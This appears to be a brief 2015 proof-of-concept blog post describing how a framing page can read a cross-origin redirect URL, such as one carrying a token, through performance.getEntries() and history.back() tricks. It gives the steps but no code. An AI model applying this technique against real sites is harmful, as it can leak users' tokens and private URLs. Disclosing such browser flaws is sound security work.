PoC steal URL x-domain

18 jul 2015 by cgvwzq

It is possible to read a x-domain URL after a redirect using perfomance.getEntries() if the page can be iframed.

The issue is affecting ALL current browsers (Chrome, FF and IE). Update: For specific Firefox and Chrome versions, click.

Steps:

  1. The target page (1) is loaded in our frame
  2. performance entry is set
  3. The page follows the redirect to (2), x-domain pages should don't know the current URL
  4. We redirect the frame to an arbitrary url, and force a history.back()
  5. The frame loads (2) from cache, and a performance is set
  6. This time the entry contains the redirection (2) instead of the original url (1)

It take a few seconds, anyway the delay can be reduced.

Page http://demo.vwzq.net/php/token_redirect.php redirected to ....